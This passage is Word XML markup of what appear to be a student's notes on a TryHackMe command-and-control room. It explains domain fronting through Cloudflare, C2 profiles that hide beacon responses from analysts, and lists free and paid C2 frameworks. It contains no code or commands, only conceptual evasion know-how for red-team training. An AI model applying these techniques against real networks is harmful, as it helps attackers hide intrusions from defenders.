          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Domain Fronting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Fronting utilizes a known, good host (for example) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cloudflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cloudflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs a business that provides enhanced metrics on HTTP connection details as well as caching HTTP connection requests to save bandwidth.  Red Teamers can abuse this to make it appear that a workstation or server is communicating with a known, trusted IP Address. Geolocation results will show wherever the nearest </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cloudflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> server is, and the IP Address will show as ownership to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cloudflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="002E7DA0" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E7DA0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1967841"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7" name="Picture 7" descr="C:\Users\shefali\Pictures\THM\2.5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fali\Pictures\THM\2.5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67841"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>This diagram shows an example HTTP beacon from a compromised device.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The diagram above dep</w:t>
      </w:r>
      <w:r w:rsidR="00C35805">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>icts how Domain Fronting works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1. The C2 Operator has a domain that proxies all requests through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cloudflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2. The Victim beacons out to the C2 Domain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cloudflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> proxies the request, then looks at the Host header and relays the traffic to the correct server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">4. The C2 Server then responds to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cloudflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the C2 Commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C35805" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5. The Victim then receives the command from Cloudflare.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="00C35805" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C35805">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>C2 Profiles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The next technique goes by several names by several different products, "NGINX Reverse Proxy", "Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Mod_Proxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Mod_Rewrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,  "</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Malleable HTTP C2 Profiles", and many others. However, they are all more or less the same. All of the Proxy features more or less allow a user to control specific elements of the incoming HTTP request. Let's say an incoming connection request has an "X-C2-Server" header; we could explicitly extract this header using the specific technology that is at your disposal (Reverse Proxy, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Mod_Proxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/Rewrite, Malleable C2 Profile, etc.) and ensure that your C2 server responds with C2 based responses. Whereas if a normal user queried the HTTP Server, they might see a generic webpage. This is all dependent on your configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="002E7DA0" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E7DA0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2983896"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="8" name="Picture 8" descr="C:\Users\shefali\Pictures\THM\2.6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fali\Pictures\THM\2.6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83896"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">A Compromised Device and Security Analyst reach out to a C2 server, only the Compromised device gets a C2 Beacon back - the Analyst gets </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cloudflare's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> website back.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The diagram abov</w:t>
      </w:r>
      <w:r w:rsidR="0031439F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>e depicts how C2 profiles work:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1. The Victim beacons out to the C2 Server with a custom header in the HTTP request, while a SOC Analyst has a normal HTTP Request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2. The requests are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>proxied</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cloudflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3. The C2 Server receives the request and looks for the custom header, and then evaluates how to respond based on the C2 Profile.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF3228" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4. The C2 Server responds to the client and responds to the Analyst/Compromised device.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7C34" w:rsidRDefault="008E7C34" w:rsidP="008E7C34">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00100AD6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Answer to the questions of this section-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7C34" w:rsidRDefault="00964719" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964719">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1802898"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="9" name="Picture 9" descr="C:\Users\shefali\Pictures\THM\2.7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efali\Pictures\THM\2.7c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02898"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1CD5" w:rsidRDefault="006C1CD5" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D22D2A" w:rsidRDefault="00040877" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040877">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Task 3 Common C2 Frameworks </w:t>
      </w:r>
      <w:r w:rsidR="008E7C34">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7DD2" w:rsidRPr="000C7DD2" w:rsidRDefault="000C7DD2" w:rsidP="000C7DD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7DD2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Common C2 Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7DD2" w:rsidRPr="000C7DD2" w:rsidRDefault="000C7DD2" w:rsidP="000C7DD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7DD2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Throughout your journey, you may encounter many different C2 Frameworks; we will discuss a few popular C2 Frameworks that are widely used by Red Teamers and Adversaries alike. We will be d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ividing this into two sections:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7DD2" w:rsidRPr="000C7DD2" w:rsidRDefault="000C7DD2" w:rsidP="000C7DD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7DD2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    Free</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7DD2" w:rsidRPr="000C7DD2" w:rsidRDefault="000C7DD2" w:rsidP="000C7DD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    Premium/Paid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7DD2" w:rsidRPr="000C7DD2" w:rsidRDefault="000C7DD2" w:rsidP="000C7DD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7DD2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>You may ask some questions like “Why would I use a premium or paid C2 framework?”, and this is an excellent question. Premium/Paid C2 frameworks usually are less likely to be detected by Anti-Virus vendors. This is not to say that it's impossible to be detected, just that open-source C2 projects are generally well understood, and signatu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>res can be easily be developed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7DD2" w:rsidRPr="000C7DD2" w:rsidRDefault="000C7DD2" w:rsidP="000C7DD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7DD2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Usually, premium C2 frameworks generally have more advanced post-exploitation modules, pivoting features, and even feature requests that open-source software developers may sometimes not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C7DD2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>fulfill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C7DD2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. For example, one feature Cobalt Strike offers that most other C2 frameworks do not is the ability to open a VPN tunnel from a beacon. This can be a fantastic feature if a Proxy does not work well in your specific situation. You must do your research to find out what will work best for your team.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3391" w:rsidRPr="00EA3391" w:rsidRDefault="00EA3391" w:rsidP="00EA3391">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3391">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Free C2 Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7DD2" w:rsidRDefault="00647324" w:rsidP="000C7DD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00647324" w:rsidRDefault="00647324" w:rsidP="000C7DD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Armitage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00647324" w:rsidRDefault="00324F6E" w:rsidP="000C7DD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Empire/ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Startkiller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00324F6E" w:rsidRDefault="00266F31" w:rsidP="000C7DD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Covenant</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00266F31" w:rsidRDefault="00BB6F4E" w:rsidP="000C7DD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sliver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB6F4E" w:rsidRDefault="00BB6F4E" w:rsidP="000C7DD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B41CE" w:rsidRPr="004B41CE" w:rsidRDefault="004B41CE" w:rsidP="004B41CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B41CE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Paid C2 Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB6F4E" w:rsidRDefault="00F20BBE" w:rsidP="000C7DD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cobalt Strike</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F20BBE" w:rsidRDefault="004C4158" w:rsidP="000C7DD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ratel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009725F6" w:rsidRPr="009725F6" w:rsidRDefault="009725F6" w:rsidP="009725F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009725F6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Other C2 Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0080700E" w:rsidRPr="000C7DD2" w:rsidRDefault="009725F6" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009725F6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">For a more comprehensive list of C2 Frameworks and their capabilities, check out the “C2 Matrix”, a project maintained by Jorge </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009725F6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Orchilles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009725F6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Bryson </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009725F6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009725F6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. It has a far more comprehensive list of almost all C2 Frameworks that are currently available. We highly recommend that after this room, you go check it out and explore some of the other C2 Frameworks that were not discussed in this room.</w:t>
